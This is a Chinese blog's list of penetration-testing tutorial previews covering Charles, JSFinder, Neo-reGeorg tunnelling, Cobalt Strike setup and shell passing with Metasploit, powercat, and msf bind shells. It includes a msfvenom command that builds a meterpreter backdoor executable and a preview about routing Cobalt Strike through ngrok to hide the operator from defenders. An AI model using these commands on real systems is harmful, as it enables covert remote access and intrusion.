![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
工具
shy014
这个作者很懒,什么都没留下…
展开
-
Charles抓取APP数据包
简介Charles 是在 PC 端常用的网络封包截取工具,在做开发时,我们为了调试与服务器端的网络通讯协议,常常需要截取网络封包来分析。除了调试端口外,Charles 也可以用于分析第三方应用的通讯协议。配合 Charles 的 SSL 功能,Charles 还可以分析 Https 协议。Charles 通过将自己设置成系统的网络访问代理服务器,使得所有的网络访问请求都通过它来完成,从而实现了网络封包的截取和分析,也就是抓包啦。Charles 主要的功能包括: 截取 Http 和 Http原创 2021-03-01 23:51:41 · 413 阅读 · 0 评论 -
JSFinder使用方法
JSFinderJSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。下载地址:https://github.com/Threezh1/JSFinder使用方法:1,解压后通过python3使用;2,简单爬取python JSFinder.py -u http://www.mi.com3,深度爬取python JSFinder.py -u http://www.mi.com -dpython JSFinder.py -u http://w原创 2021-01-27 15:17:19 · 9787 阅读 · 1 评论 -
工具之使用教程Neo-reGeorg
Neo-reGeorg是常见的http正向隧道工具,是reGeorg工具的升级版。增加了很多特性,例如像内容加密、避免被检测、请求头定制、响应码定制、支持py3等等reGeorg:1,在aspx和jsp环境下可以正常使用 2,php环境中tunnel.php文件要依赖dl("php_sockets.dll");通过dl函数加载扩展,这种方式局限性很大,很多环境下都不支持dl函数。 3,tunnel.nosocket.php文件虽然可以不依赖dl函数,但是使用了flush()这个函数,部分PHP环原创 2020-11-30 16:14:31 · 12084 阅读 · 0 评论 -
内网之利用ngrok使用cobaltstrike
场景:像我这样遵纪守法的祖国的好公民,最近遇到了一个很烦恼的问题,在渗透一些网站的时候需要cs上线,而我cs的服务器端是我的vps,我的vps上有解析了我的域名,而我的域名又进行了实名认证。如果使用cs进行上线,这不是明摆着给蓝队进行送分嘛。这不行,这可不行,不用cs又特别的麻烦。于是就想到可以通过ngrok隧道,隐藏IP进行上线。原理:大概的流程就是将cs的服务端与ngrok公网IP建立隧道,建立两个监听器,使用公网IP的监听器生成后门,使用cs服务端的监听器接收shell。当后门运行的时候,它会去访原创 2020-11-12 15:45:25 · 1426 阅读 · 0 评论 -
Cobalt Strike之与msf互相派生shell
一,msf派生shell给cobalstrike1,cs添加监听器2,msf上在已经获取到的会话(shell)中注入一个新的payloadmsf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http //cs监听器中相同msf exploit(payload原创 2020-10-28 16:12:28 · 2939 阅读 · 2 评论 -
工具之powercat使用教程
下载地址:https://github.com/besimorhino/powercat运行使用:由于PowerCat是NetCat的PowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。kali:192.168.206.128win10:192.168.206.1-eExecute. Specify the name of the process to start.运行。开启运行一个程序.原创 2020-10-06 11:17:53 · 3261 阅读 · 0 评论 -
msf之正向shell的使用
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。1,生成正向shell后门文件msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe2,上传到目标机器上3.配置监听(很重要)4,运行目标机上的后门文件,获取shell1,2是正向sh.原创 2020-09-28 10:34:29 · 8789 阅读 · 5 评论 -
CS1之安装
服务端1,将CS上传到kali上去,然后解压2,给权限3,服务端启动./teamserver 192.168.72.129 123456192.168.148.141是服务端ip,123456是客户端启动连接服务端要提供的密码客户端:1,命令行启动javaw -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+Use..原创 2020-08-24 16:25:48 · 376 阅读 · 0 评论